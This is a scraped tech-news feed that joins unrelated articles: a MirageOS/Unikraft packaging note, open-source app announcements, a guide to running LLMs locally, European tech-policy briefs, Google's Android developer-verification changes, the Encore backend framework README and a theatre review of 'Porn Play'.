See below for some explanations about the numerous OCaml/Unikraft packages. From then on, you can follow the standard procedure (see how to install MirageOS and how to build a hello-world unikernel ) to build your unikernel with the Unikraft backend of your choice, which should boil down to something like:

$ mirage configure -t unikraft-qemu
$ make

Details About the Various Packages for the OCaml/Unikraft Cross Compiler

The OCaml cross compiler to Unikraft is split up into 14 packages (see the PR to opam-repository for more details) so that users can:

  • Choose which of the backends (QEMU or Firecracker) and which of the architectures ( x86_64 and arm64 ) they want to install; all combinations can be installed at the same time.
  • Choose which architecture is generated when they use the unikraft OCamlfind toolchain by installing one of the two ocaml-unikraft-default-<arch> packages.
  • Install the ocaml-unikraft-option-debug package to enable the (really verbose!) debugging messages.

Furthermore, virtual packages can be installed to make sure that one of the architecture-specific packages is indeed installed:

  • ocaml-unikraft can be installed to make sure that there is indeed a unikraft OCamlfind toolchain installed.
  • ocaml-unikraft-backend-qemu and ocaml-unikraft-backend-firecracker can be installed to make sure that the unikraft OCamlfind toolchain supports the corresponding backend.

Those virtual packages will be used by the mirage tool when the target is unikraft-qemu or unikraft-firecracker .
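For instance, an illustrative setup targeting Firecracker on arm64 (following the naming scheme above; see the opam-repository PR for the exact package list) could look like:

$ opam install ocaml-unikraft-backend-firecracker ocaml-unikraft-default-arm64
$ mirage configure -t unikraft-firecracker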

All those packages use one of two version numbers. The backend packages use the Unikraft version number (0.18.0 and 0.20.0 have been tested and packaged) while the latest OCaml cross-compiler packages use version 1.1.0.

Conclusion

We are still experimenting with this new backend. We expect to run it in production in the coming months, though it may still need improvements. Notably absent from this release is an early attempt to leverage Unikraft’s POSIX compatibility to implement Mirage interfaces instead of hooking directly into Unikraft’s internal components. That early version used Unikraft’s lwIP -based network stack instead of Mirage’s (fooling Mirage into thinking it was running on Unix), and it may be interesting to revisit this kind of deployment, in particular for easy inclusion of Unix-only OCaml libraries in unikernels.

We are eager for reviews, comments, and discussion on the implementation, design, and approach of this new Mirage backend, and hope it will be useful to others.

You can connect with us on Bluesky , Mastodon , Threads , and LinkedIn or sign up for our mailing list to stay updated on our latest projects. We look forward to hearing from you!

EDE: Small and Fast Desktop Environment

Hacker News
edeproject.org
2025-11-14 12:51:23
Comments...
Original Article

EDE is a small desktop environment built to be responsive, light on resource usage, and familiar in look and feel. It runs on Linux, *BSD, Solaris, Minix, Zaurus, and even on the XBox.

Download version 2.1

or you can browse for older releases.

Winamp for OS/X

Hacker News
github.com
2025-11-14 12:44:07
Comments...
Original Article

Winamp macOS

A native macOS application that recreates the classic Winamp experience for playing MP3 and FLAC audio files.

Full Screen

Fullscreen Visualizer

Minimized (Playlist + Main Window independently)

Minimized Playlist

Releases / Download

Releases

Support

If you enjoy using Winamp macOS and would like to support its development, consider buying me a coffee:

Buy Me A Coffee

Support on Buy Me a Coffee

Features

  • 🎵 MP3 and FLAC playback support

  • 🎨 Winamp-inspired UI

  • 📝 Playlist management / M3U

  • ⏯️ Full playback controls (play, pause, stop, next, previous)

  • 📊 Spectrum analyzer visualization

  • 🎚️ 10-band equalizer

  • 🔍 File browser with drag-and-drop support

  • Multiple oscilloscope visualizations

  • Milkdrop (click on the icon in the main app) - supports fullscreen mode

  • Lyrics overlay in Milkdrop

Requirements

  • macOS 13.0 or later
  • Xcode 15.0 or later

Building

Using Xcode

  1. Open Winamp.xcodeproj in Xcode
  2. Select the Winamp scheme
  3. Build and run (⌘R)

alternatively

Using Swift Package Manager


License

MIT License - Feel free to use and modify as needed.

Arrival Radar

Hacker News
entropicthoughts.com
2025-11-14 12:23:53
Comments...
Original Article

Your objective is to land planes as quickly as possible while maintaining separation between them, and you do this by assigning them routes that take them to the final approach. That’s all you can do, in contrast to other ATC simulators, which let you vector planes directly, assign altitudes and speeds, etc. This constraint makes for some challenge, because planes arrive randomly and tend to end up violating separation minima unless you assign routes cleverly and actively.

arrival-radar-01.png

In order to prevent conflicts, you’ll have to be deft at re-assigning routes and asking planes to join their routes at specific waypoints. To help you in your mission, the planes do slow down a little if there is other traffic ahead of them, and there are speed restrictions on waypoints closer to the airport to make higher density possible where the routes come together.

It’s fun and addictive! Click the link above to read more about the game and how to play.

How to Deploy LLM Locally

Lobsters
blog.lyc8503.net
2025-11-14 12:18:42
Comments...
Original Article

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Content for a club presentation, archived here. LLMs evolve rapidly—this might become outdated quickly, so please use your search skills flexibly to get the latest information.


Introduction

A few years ago, before LLMs burst onto the scene, many small models could easily run on all sorts of devices.

For example, you could casually whip up a CNN with fewer than 1000 parameters , train it on MNIST in under a minute, achieve 94% accuracy on handwritten digit recognition, and—on modern GPUs—process over 10,000 images per second without any optimization effort.

A super tiny CNN with just 786 parameters

Now you’ve learned CNNs. Just make it a tiny bit deeper and wider like this , scale it up 16,000x to 13.5M parameters, and you can boost its recognition power even further. For instance, you could use it to crack CAPTCHAs.

Purely for demonstration: a CAPTCHA

This CAPTCHA solver is from my Tampermonkey script lyc8503/ddddocr_web , powered by ONNX Wasm running directly in the browser. Even on a regular laptop CPU, it solves CAPTCHAs in under 0.2 seconds with over 95% accuracy.

Back in the pre-LLM era, state-of-the-art models like BERT or ResNet typically stayed under 100M in size.

The LLM Era

In November 2022, OpenAI launched the ChatGPT series. GPT-3 scaled up another 1000x, reaching a staggering 175B parameters—its weights alone take up 350 GB of space. This poses a massive challenge for local deployment.

Image from bbycroft.net/llm

Why We Need Locally Deployable Open-Weight LLMs

  1. Transparency and consistency
  2. Lower costs and prevention of monopolies
  3. Bypassing online content censorship ( “data security” )
  4. Ability to fine-tune or hack the model

How to Run an LLM in Three Steps (like stuffing an elephant into a fridge)

  1. Get suitable hardware
  2. Download model weights
  3. Install a proper inference framework and run it

Qwen3-Next-80B-A3B running locally, 46 tokens/s
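As a minimal sketch of steps 2 and 3, assuming a GGUF-format model and a recent llama.cpp build (the repository and file names below are placeholders):

$ huggingface-cli download <org>/<model>-GGUF <model>-Q5_K_M.gguf --local-dir models
$ ./llama-cli -m models/<model>-Q5_K_M.gguf -p "Hello"   # generates text and reports tokens/s at the end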

Model Selection

Every model claims to be SOTA when released—so which one should you pick? I usually check the cyber-cricket-fighting leaderboard: https://lmarena.ai/leaderboard

For niche models, you can also search HuggingFace or forums like r/LocalLLaMA . There’s a new model popping up every day.

Models can be categorized by how many parameters are activated during inference:

  • Dense models
  • MoE (Mixture of Experts) models

They can also be classified by whether they have a “thinking” process:

  • Thinking
  • Instruct
  • Hybrid

Hardware Selection

Here’s a rough ranking of hardware components by importance:

  1. VRAM (Video Memory Size)
    The deciding factor. Insufficient VRAM forces offloading to system RAM or even disk, which can drastically slow things down.

    • NVIDIA H100: 80GB
    • NVIDIA A100: 40GB / 80GB
    • RTX 4090: 24GB
  2. Memory Bandwidth
    Large models need high-speed access to all parameters for efficient computation (a rough worked estimate follows this list).

    • H100: ~2 TB/s
    • A100: ~1.5 TB/s
    • RTX 4090: ~1 TB/s
    • CPU DDR5: ~100 GB/s (PCIe 4.0 x16 ~32 GB/s)
  3. Compute Power (BF16/FP16)

    • H100 (BF16 Tensor): ~200 TFLOPS
    • A100 (BF16 Tensor): ~78 TFLOPS
    • RTX 4090 (FP16): ~83 TFLOPS
    • EPYC 9654: theoretical ~4 TFLOPS
  4. Multi-GPU Interconnect Bandwidth (if applicable)

    • NVLink: 56 GB/s
    • PCIe: 32 GB/s, higher latency
  5. CPU RAM Bandwidth / Compute Power (when offloading to CPU)
    DDR5 >> DDR4, multi-channel >> single-channel

  6. SSD Read Speed
    PCIe 4.0 x4: 7 GB/s
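A rough back-of-envelope estimate of why bandwidth dominates (illustrative numbers, not benchmarks): generating one token requires reading roughly all of the active weights once, so decode speed ≈ memory bandwidth ÷ active-weight size. A dense 8B model quantized to about 4–5 bits is roughly 4–5 GB of weights, so ~1 TB/s of GPU bandwidth caps out at around 200–250 tokens/s, while ~100 GB/s of dual-channel DDR5 caps out at around 20–25 tokens/s. MoE models follow the same logic, counting only the experts activated per token.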

If you’re building your own rig, consider “scavenging” older cards like the 2080 Ti, MI50, or V100.

Framework Selection and Common Optimization Techniques

Quantization

Models are typically trained in FP16 precision, and published weights are often in this format. During inference, reducing floating-point precision can significantly cut memory usage.

Rule of thumb: Quantization levels Q6 (6-bit) and above—such as Q7 or FP8—have negligible impact on model performance. Q5 causes slight degradation, Q4 is noticeably worse, and Q3 or below might as well be a different model entirely.

Unsloth publishes many quantized versions of popular models.
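As a concrete sketch with llama.cpp (tool and option names have changed across versions, so treat this as illustrative; ./my-model stands in for a downloaded Hugging Face checkpoint): convert the released weights to GGUF, then quantize. An 8B model shrinks from roughly 16 GB at FP16 to roughly 5–6 GB at Q5.

$ python convert_hf_to_gguf.py ./my-model --outfile my-model-f16.gguf
$ ./llama-quantize my-model-f16.gguf my-model-Q5_K_M.gguf Q5_K_M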

CPU Offload

Move some model layers to the CPU, allowing both CPU and GPU to compute together.

Works especially well for MoE models with sparse activation.

https://github.com/ggml-org/llama.cpp

Pros: Optimized for CPU/GPU hybrid inference, mobile-friendly, extremely popular, broad model support
Cons: No tensor parallelism support, poor multi-GPU utilization
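For example, llama.cpp controls the CPU/GPU split with its GPU-layers option; a minimal sketch (reusing the hypothetical model file from the quantization example above):

$ ./llama-cli -m my-model-Q5_K_M.gguf -ngl 20 -p "Hello"   # keep 20 layers on the GPU, run the remaining layers on the CPU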

https://github.com/ztxz16/fastllm

Pros: Made by Chinese developers, supports diverse hardware, good CPU/GPU hybrid inference, includes unique performance optimizations
Cons: Fewer supported models, limited documentation, occasional bugs

Magit manuals are available online again

Hacker News
github.com
2025-11-14 12:09:59
Comments...
Original Article

I'm just getting started with Magit, and it works in my Emacs, but I wanted to go over some tutorials from the webpage. magit.vc does not work currently.

Show HN: European Tech News in 6 Languages

Hacker News
europedigital.cloud
2025-11-14 12:00:57
Comments...
Original Article

Daily digest of all European digital development news

They stole almost 23,000 euros with the SIM swapping scam. Now Vodafone and Ibercaja will have to return it

Vodafone and Ibercaja were ordered to refund nearly €23,000 to a customer scammed via SIM swapping. The court ruled the companies were liable after fraudsters duplicated the victim's SIM and stole the money.

November 13, 2025 at 16:30

The anti-abuse bracelets were going to be a technical solution to a social problem. They are generating a chaos of incidents

The Spanish Cometa system, managing anti-abuse bracelets, suffered a technical incident causing service overload and triggering an emergency protocol. The issue affected the safety of approximately 4,500 women using the devices, with roughly 10% of alerts causing system failures.

November 13, 2025 at 16:00

Digital Markets Act: EU Commission Accuses Google of Discrimination Against News Sites

Brussels launched a new investigation into Google's parent company, Alphabet, for potential Digital Markets Act violations. The EU suspects Google's search results may discriminate against news websites, impacting their visibility.

November 13, 2025 at 15:18

FMC raises €100M as it unveils new class of memory chips for the AI era

FMC secured €100 million to revolutionize memory chips, aiming for faster, more energy-efficient AI data centers. The funding, led by HV Capital and DTCF, will help the company compete with global chip manufacturers.

November 13, 2025 at 14:46

DMA: EU Commission examines possible media discrimination by Google

The European Commission investigates Google over potential media discrimination in its search rankings, impacting legitimate content visibility. This probes whether Google's practices violate the Digital Markets Act, especially for news outlets.

November 13, 2025 at 14:28

The biggest European security tech deals in H1 2025

Paris-based Didomi, a consent and privacy management platform, secured €72M in funding during the first half of 2025. This allows businesses to manage user data choices while ensuring compliance with global data regulations.

November 13, 2025 at 13:00

Zilch nets $175M as eyes "strategic" M&A

Zilch, a UK fintech, secured over $175 million in funding, led by KKCG, to fuel growth and acquisitions. The company, with over 5 million customers, aims to expand its brand and product development.

November 13, 2025 at 12:10

Introw raises $3M to redefine partner sales with AI

Ghent-based startup Introw secured $3M led by Visionaries Club to redefine partner sales with its AI platform. The platform connects quickly to a company's CRM, reducing setup time from months to minutes, and has already facilitated tens of thousands of partner interactions since launching in 2023.

November 13, 2025 at 12:00

Commission opens investigation into potential Digital Markets Act breach by Google in demoting media publishers' content in search results

The European Commission launched an investigation into Google for potentially violating the Digital Markets Act by demoting media publishers' content. The probe focuses on Google's "site reputation abuse policy," which the Commission suspects impacts publishers' ability to conduct business.

November 13, 2025 at 11:04

European Commission Digital Strategy

Cronvall secures €3.9M to scale smarter industrial procurement across Europe

Cronvall, a Finnish tech company, secured €3.9M to scale its digital industrial procurement platform across Europe...

November 13, 2025 at 11:00

Judge grants Meta limited postponement in Bits of Freedom lawsuit

Meta secures a limited postponement in a lawsuit brought by Bits of Freedom regarding user feed choices on Instagram and Facebook. The court granted the delay after Meta argued it couldn't implement the required changes within the original two-week timeframe.

November 13, 2025 at 09:30

The AI Act isn’t enough: closing the dangerous loopholes that enable rights violations

The EU's AI Act faces criticism for loopholes enabling unchecked AI use in national security and law enforcement, risking mass surveillance. EDRi affiliate, Danes je nov dan, recommends Slovenia adopt stricter safeguards to address these issues.

November 13, 2025 at 09:30

X faces DSA probe in Ireland over its content moderation system

X faces a probe in Ireland over its content moderation system under the Digital Services Act. The investigation will examine if users can appeal content moderation decisions.

November 13, 2025 at 09:12

Checklist: How digitally resilient is your organization?

Dutch organizations are encouraged to assess their digital resilience against ransomware attacks using a new readiness checklist. The checklist helps organizations evaluate current security measures and identify areas for improvement in prevention, crisis recovery, and governance.

November 13, 2025 at 09:11

Forthcoming Digital Omnibus would mark point of no return

Civil society groups are urging the European Commission to halt the Digital Omnibus, a proposed package they claim will weaken key EU laws. The coalition of 127 organizations says the proposals would be the biggest rollback of digital rights in EU history.

November 13, 2025 at 09:01

Backed VC closes $100M Fund III and marks 100th investment milestone

Backed VC closes its third fund at $100 million and celebrates its 100th investment in frontier tech startups. The fund will focus on AI-native therapeutics, blockchain, and manufacturing automation, with previous investments yielding five unicorns.

November 13, 2025 at 09:00

Skycore Semiconductors secures €5M to drive next-generation AI data centre innovation

Danish startup Skycore Semiconductors secured €5 million in seed funding to develop Power IC technology for AI data centers. The company’s solutions aim to address power infrastructure challenges with 800V high-voltage direct current (HVDC) architectures.

November 13, 2025 at 09:00

CommerceClarity completes €2.7M funding to power the agentic era of e-commerce

Italian startup CommerceClarity secured €2.7 million to fuel the agentic era of e-commerce with its AI operating system...

November 13, 2025 at 07:30

Vendep Capital raises €80M to back the next wave of AI-era SaaS founders

Finnish VC firm Vendep Capital launches an €80 million fund to back early-stage SaaS founders in the Nordics and Baltics. The fund, backed by European investors, will invest in approximately 20 startups with initial investments between €100k and €3M.

November 13, 2025 at 07:01

CHAOS attracts €2M to scale AI platform and reinvent real estate

Finnish data-intelligence company CHAOS secures €2 million to scale its AI platform for the real estate industry. The funding will fuel expansion across the Nordics and DACH regions, offering AI-driven insights to developers and investors.

November 13, 2025 at 07:00

The Role of Humans in an AI-Powered World

Schneier
www.schneier.com
2025-11-14 12:00:33
As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions. For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, ...
Original Article

As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions.

For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, you would take the AI in a second. You want the more accurate tool. But justice is harder because justice is inherently a human quality in a way that “Is this tumor cancerous?” is not. That’s a fact-based question. “What’s the right thing to do here?” is a human-based question.

Chess provides a useful analogy for this evolution. For most of history, humans were best. Then, in the 1990s, Deep Blue beat the best human. For a while after that, a good human paired with a good computer could beat either one alone. But a few years ago, that changed again, and now the best computer simply wins. There will be an intermediate period for many applications where the human-AI combination is optimal, but eventually, for fact-based tasks, the best AI will likely surpass both.

The enduring role for humans lies in making judgments, especially when values come into conflict. What is the proper immigration policy? There is no single “right” answer; it’s a matter of feelings, values, and what we as a society hold dear. A lot of societal governance is about resolving conflicts between people’s rights—my right to play my music versus your right to have quiet. There’s no factual answer there. We can imagine machines will help; perhaps once we humans figure out the rules, the machines can do the implementing and kick the hard cases back to us. But the fundamental value judgments will likely remain our domain.

This essay originally appeared in IVY .


Google backpedals on new Android developer registration rules

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 11:54:44
Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. [...]...
Original Article

Android

Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs.

As announced in August , Google was planning to introduce what it called "Developer Verification" starting in 2026 to block malware spreading via sideloaded apps sourced from outside the official Google Play app store.

The new rules require that all apps must originate from developers with verified identities to be installed on certified Android devices; otherwise, their installation will be blocked.

However, the announcement was met with widespread backlash from Android users and developers (outraged by the registration process, which required them to pay a fee and provide government identification), who organized to report Google to their national regulators and discourage others from signing up for Google's developer registration early access program.

F-Droid, the most popular third-party Android app store, also warned last month that Google's new registration could mean the end of the project.

"We do not believe that developer registration is motivated by security. We believe it is about consolidating power and tightening control over a formerly open ecosystem," F-Droid said .

In response to the negative feedback, Google stated that it will "shape a dedicated account type" for developers who wish to distribute apps to limited audiences, such as family or friends, "without going through the full verification requirements."

The company also announced that it is developing a "new advanced flow" for experienced users with a higher risk tolerance who wish to sideload unverified apps. This new system will provide warnings about the associated risks but will ultimately allow users to make their own choices.

"We appreciate the community's engagement and have heard the early feedback – specifically from students and hobbyists who need an accessible path to learn, and from power users who are more comfortable with security risks. We are making changes to address the needs of both groups," said Matthew Forsythe , Director of Product Management for Android App Safety.

With these concessions in place, Google has started inviting developers distributing outside of the Play Store to early access for developer verification in the Android Developer Console, and also plans to invite Play developers to the program starting November 25.

Android developer verification will be open to all developers in March 2026. Beginning in September 2026, apps must be registered by verified developers to be installed on Android devices in Brazil, Indonesia, Singapore, and Thailand, with a global rollout planned for 2027.


Show HN: Encore – Type-safe back end framework that generates infra from code

Hacker News
github.com
2025-11-14 11:41:47
Comments...
Original Article

Open Source Framework for creating type-safe distributed systems with declarative infrastructure

  • Backend Frameworks: Encore.ts and Encore.go simplify creating microservices and type-safe APIs, and provide an AI-ready declarative approach to define infrastructure in code.
  • Local Development: Encore's CLI automatically manages local infrastructure and provides a development dashboard with tracing, service catalog, and architecture diagrams.
  • Infrastructure Integration: Simplified integration with cloud infrastructure using the open source CLI ( learn more ), or using the optional Encore Cloud platform to automate DevOps and infrastructure provisioning in your own cloud on AWS and GCP.

⭐ Star this repository to help spread the word.

Install Encore:

  • macOS: brew install encoredev/tap/encore
  • Linux: curl -L https://encore.dev/install.sh | bash
  • Windows: iwr https://encore.dev/install.ps1 | iex

Create your first app:

  • TypeScript: encore app create --example=ts/hello-world
  • Go: encore app create --example=hello-world

Add Encore LLM instructions to your app:

How it works

Encore's open source backend frameworks Encore.ts and Encore.go enable you to define resources like services, databases, cron jobs, and Pub/Sub, as type-safe objects in your application code.

With the frameworks you only define infrastructure semantics, the things that matter to your application's behavior, not configuration for specific cloud services. Encore parses your application and builds a graph of both its logical architecture and its infrastructure requirements; it then automatically generates boilerplate and helps orchestrate the relevant infrastructure for each environment. This means the same application code can be used to run locally, test in preview environments, and deploy to cloud environments on e.g. AWS and GCP.

This often removes the need for separate infrastructure configuration like Terraform, increases standardization in both your codebase and infrastructure, and makes your application highly portable across cloud providers.

Encore is fully open source, there is no proprietary code running in your application .

Example: Hello World

Defining microservices and API endpoints is incredibly simple—with fewer than 10 lines of code, you can create a production-ready, deployable service.

Hello World in Encore.ts

import { api } from "encore.dev/api";

export const get = api(
  { expose: true, method: "GET", path: "/hello/:name" },
  async ({ name }: { name: string }): Promise<Response> => {
    const msg = `Hello ${name}!`;
    return { message: msg };
  }
);

interface Response {
  message: string;
}

Hello World in Encore.go

package hello

// Imports needed for the snippet to compile as regular Go.
import (
	"context"
	"fmt"
)

//encore:api public path=/hello/:name
func World(ctx context.Context, name string) (*Response, error) {
	msg := fmt.Sprintf("Hello, %s!", name)
	return &Response{Message: msg}, nil
}

type Response struct {
	Message string
}

Example: Using Pub/Sub

If you want a Pub/Sub Topic, you declare it directly in your application code and Encore will integrate the infrastructure and generate the boilerplate code necessary. Encore supports the following Pub/Sub infrastructure:

  • NSQ for local environments (automatically provisioned by Encore's CLI)
  • GCP Pub/Sub for environments on GCP
  • SNS/SQS for environments on AWS

Using Pub/Sub in Encore.ts

import { Topic } from "encore.dev/pubsub";

export interface SignupEvent {
    userID: string;
}

export const signups = new Topic<SignupEvent>("signups", {
    deliveryGuarantee: "at-least-once",
});

Using Pub/Sub in Encore.go

import "encore.dev/pubsub"

type User struct { /* fields... */ }

var Signup = pubsub.NewTopic[*User]("signup", pubsub.TopicConfig{
  DeliveryGuarantee: pubsub.AtLeastOnce,
})

// Publish messages by calling a method
Signup.Publish(ctx, &User{...})

--

For more info, see the example apps: Example Apps Repo

See products being built with Encore: Showcase

Have questions? Join the friendly developer community on Discord .

Talk to a human: Book a 1:1 demo with one of our founders.

Intro video

Watch the intro video for a quick introduction to Encore concepts & code examples.

Encore Intro Video

Introduction to Encore

Building scalable applications with cloud services is powerful but often frustrating. Developers face complex setups and repetitive tasks that slow them down.

Encore solves this with an all-in-one backend development toolkit, streamlining everything from local testing to cloud integration and DevOps.

Encore Overview

Learn more in the docs

See how to use the backend frameworks in the docs:

Using Encore: An end-to-end workflow from local to cloud

Encore provides purpose-built tooling for each step in the development process, from local development and testing, to cloud DevOps. Here we'll cover the key features for each part of the process.

Local Development

When you run your app locally using the Encore CLI , Encore parses your code and automatically sets up the necessary local infrastructure on the fly. No more messing around with Docker Compose!

You also get built-in tools for an efficient workflow when creating distributed systems and event-driven applications:

  • Local environment matches cloud: Encore automatically handles the semantics of service communication and interfacing with different types of infrastructure services, so that the local environment is a 1:1 representation of your cloud environment.
  • Cross-service type-safety: When building microservices applications with Encore, you get type-safety and auto-complete in your IDE when making cross-service API calls.
  • Type-aware infrastructure: With Encore, infrastructure like Pub/Sub queues are type-aware objects in your program. This enables full end-to-end type-safety when building event-driven applications.
  • Secrets management: Built-in secrets management for all environments.
  • Tracing: The local development dashboard provides local tracing to help understand application behavior and find bugs.
  • Automatic API docs & clients: Encore generates API docs and API clients in Go, TypeScript, JavaScript, and OpenAPI specification.

Here's a video showing the local development dashboard:

localdashvideo.2.mp4

Testing

Encore comes with several built-in tools to help with testing:

  • Built-in service/API mocking: Encore provides built-in support for mocking API calls , and interfaces for automatically generating mock objects for your services.
  • Local test infra: When running tests locally, Encore automatically provides dedicated test infrastructure to isolate individual tests.
  • Local test tracing: The Local Development Dashboard provides distributed tracing for tests, providing great visibility into what's happening and making it easier to understand why a test failed.
  • Preview Environments: When using Encore Cloud (optional), it automatically provisions a temporary cloud-based Preview Environment for each Pull Request, an effective tool when doing end-to-end testing.

Optional: Automate your AWS/GCP with Encore Cloud

Encore Cloud is Encore's managed service offering for teams wanting to focus their engineering effort on their product development, avoiding investing time in platformization and DevOps.

Encore Cloud provides automatic infrastructure provisioning in your cloud on AWS & GCP . So instead of writing Terraform, YAML, or clicking in cloud consoles, you connect your cloud account and simply deploy your application. Since using Encore's open source backend frameworks means your application code is cloud agnostic and not tied to any specific infrastructure services, Encore Cloud enables you to change your infrastructure depending on your evolving needs, without needing to make code changes or manually update infrastructure config files.

When you deploy, Encore Cloud automatically provisions infrastructure using battle-tested cloud services on AWS and GCP, such as:

  • Compute: GCP Cloud Run, AWS Fargate, Kubernetes (GKE and EKS)
  • Databases: GCP Cloud SQL, AWS RDS
  • Pub/Sub: GCP Pub/Sub, AWS SQS/SNS
  • Caches: GCP Memorystore, Amazon ElastiCache
  • Object Storage: GCS, Amazon S3
  • Secrets: GCP Secret Manager, AWS Secrets Manager
  • Etc.

Encore Cloud also includes cloud versions of Encore's built-in development tools.

Here's a video showing the Encore Cloud dashboard:

envs.mp4

Why use Encore?

  • Faster Development : Encore streamlines the development process with its backend frameworks, clear abstractions, and built-in local development tools.
  • Scalability & Performance : Encore simplifies building large-scale microservices applications that can handle growing user bases and demands, without the normal boilerplate and complexity.
  • Control & Standardization : Built-in tools like automated architecture diagrams, infrastructure tracking and approval workflows, make it easy for teams and leaders to get an overview of the entire application.
  • Security & Compliance : Encore Cloud helps ensure your application is secure and compliant by enforcing security standards like least privilege IAM, and provisioning infrastructure according to best practices for each cloud provider.
  • Reduced Costs : Encore Cloud's automatic infrastructure management minimizes wasteful cloud expenses and reduces DevOps workload, allowing you to work more efficiently.

Common use cases

Encore is designed to give teams a productive and less complex experience when solving most backend use cases. Many teams use Encore to build things like:

  • High-performance B2B Platforms
  • Fintech & Consumer apps
  • Global E-commerce marketplaces
  • Microservices backends for SaaS applications and mobile apps
  • And much more...

Getting started

  • 1. Install Encore:
    • macOS: brew install encoredev/tap/encore
    • Linux: curl -L https://encore.dev/install.sh | bash
    • Windows: iwr https://encore.dev/install.ps1 | iex
  • 2. Create your first app:
    • TypeScript: encore app create --example=ts/introduction
    • Go: encore app create --example=hello-world
  • 3. Star the project on GitHub to stay up-to-date
  • 4. Explore the Documentation to learn more about Encore's features
  • 5. Join Discord to ask questions and meet other Encore developers

Open Source

Everything needed to develop and deploy Encore applications is Open Source, including the backend frameworks, parser, compiler, runtime, and CLI. This includes all code needed for local development and everything that runs in your application when it is deployed.

The Open Source CLI also provides a mechanism to generate Docker images for your application, so you can easily self-host it. Learn more in the docs .

Join the most pioneering developer community

Developers building with Encore are forward-thinkers who want to focus on creative programming and building great software to solve meaningful problems. It's a friendly place, great for exchanging ideas and learning new things! Join the conversation on Discord .

We rely on your contributions and feedback to improve Encore for everyone who is using it. Here's how you can contribute:

  • Star and watch this repository to help spread the word and stay up to date.
  • Meet fellow Encore developers and chat on Discord .
  • Follow Encore on Twitter .
  • Share feedback or ask questions via email .
  • Leave feedback on the Public Roadmap .
  • Send a pull request here on GitHub with your contribution.

Videos

Visuals

Code example (Go)

Encore.example.1.mp4

Local Development Dashboard

indexvideo_5.mp4

Generated Architecture Diagrams & Service Catalog

index_1.mp4

Auto-Provisioning Infrastructure & Multi-cloud Deployments

envs.mp4

Distributed Tracing & Metrics

indexxxxx.mp4

Frequently Asked Questions (FAQ)

Who's behind Encore?

Encore was founded by long-time backend engineers from Spotify, Google, and Monzo with over 50 years of collective experience. We’ve lived through the challenges of building complex distributed systems with thousands of services, and scaling to hundreds of millions of users.

Encore grew out of these experiences and is a solution to the frustrations that came with them: unnecessary crippling complexity and constant repetition of undifferentiated work that suffocates the developer’s creativity. With Encore, we want to set developers free to achieve their creative potential.

Who is Encore for?

For individual developers building for the cloud, Encore provides a radically improved experience. With Encore you’re able to stay in the flow state and experience the joy and creativity of building.

For startup teams who need to build a scalable backend to support the growth of their product, Encore lets them get up and running in the cloud within minutes. It lets them focus on solving the needs of their users, instead of spending most of their time re-solving the everyday challenges of building distributed systems in the cloud.

For individual teams in large organizations that want to focus on innovating and building new features, Encore lets them stop spending time on operations and onboarding new team members. Using Encore for new feature development is easy, just spin up a new backend service in a few minutes.

How is Encore different?

Encore is the only tool that understands what you’re building. Encore uses static analysis to deeply understand the application you’re building. This enables a unique developer experience that helps you stay in the flow as you’re building. For instance, you don't need to bother with configuring and managing infrastructure, setting up environments and keeping them in sync, or writing documentation and drafting architecture diagrams. Encore does all of this automatically out of the box.

Why does Encore provide infrastructure integrations through Encore Cloud?

We've found that to meaningfully improve the developer experience, you have to operate across the full stack. Unless you understand how an application is deployed, there are a large number of things in the development process that you can't simplify. That's why so many other developer tools have such a limited impact. With Encore's more integrated approach, we're able to unlock a radically better experience for developers.

What if I want to migrate away from Encore?

Encore is designed to let you go outside of the framework when you want to, and easily drop down in abstraction level when you need to, so you never run into any dead-ends.

Should you want to migrate away, it's straightforward and does not require a big rewrite. 99% of your code is regular Go or TypeScript.

Encore provides tools for self-hosting your application, by using the Open Source CLI to produce a standalone Docker image that can be deployed anywhere you'd like.

Contributing to Encore and building from source

See CONTRIBUTING.md .

Porn Play review – Ambika Mod excels as an academic undone by pornography addiction

Guardian
www.theguardian.com
2025-11-14 11:34:00
Royal Court theatre, London Sophia Chetin-Leuner’s drama toggles between digital and physical worlds as it traces a scholar’s grim compulsion ‘It’s not that deep,” Ani’s friend assures her. Who cares if she watches a lot of extreme pornography? But after the light is switched off, Ani can’t get thro...
Original Article

“It’s not that deep,” Ani’s friend assures her. Who cares if she watches a lot of extreme pornography? But after the light is switched off, Ani can’t get through their impromptu sleepover without masturbating to porn on her phone. The friend wakes up next to her and exits in disgust.

The same scenario has already led Ani, a 30-year-old academic, to break up with her partner. Like Phoebe Waller-Bridge’s Fleabag , she was using porn next to her boyfriend in bed. Fleabag darkly regaled us with her voracious YouPorn habit but Ani, despite her robust reasoning in their argument, is deeply troubled by her behaviour. So, too, is her father when Ani hides away in her old childhood bedroom with her laptop.

It’s frequently funny but this bold play by Sophia Chetin-Leuner captures the wearying compulsion of an addict, showing how the search for release has turned into grim habit. The characters in her previous play, This Might Not Be It, which also has caring at its core, have a phrase for this sort of desensitised state: “your tap’s been switched off”. In a riveting performance, Ambika Mod manages to make Ani’s isolation and emptiness as moving as it is unsettling.

Isolation and emptiness … Ambika Mod and Asif Khan in Porn Play. Photograph: Helen Murray

Key to the play’s success is the way Chetin-Leuner and director Josie Rourke skilfully toggle between the digital and physical worlds to emphasise the seductive, instant gratification of the internet where, as Bo Burnham put it , “anything that brain of yours can think of can be found”. Ani’s brain has accordingly been rewired and her restless search for comfort online is a constant amid the stress that comes with professional success and her grief after her mother’s death. She recognises those as triggers yet, tellingly, co-opts a friend’s sexual revelation to hide behind instead when discussing her behaviour.

As a play about chronic addiction, this story is full of secrets, emphasised by Yimei Zhao ’s inspired design which transforms the Royal Court’s small upstairs theatre into a padded den. It’s staged in the round, typically seen as giving nowhere to hide, but Ani conceals her laptop and other belongings between the folds of the cushioned floor. The concentric, vulva-like design of the space becomes a cocoon softly lit by Mark Henderson as Ani escapes into her ritual of internet porn. But it also resembles a vortex and, in the prologue, is used to evoke Eve staring at her reflection in Milton’s Paradise Lost.

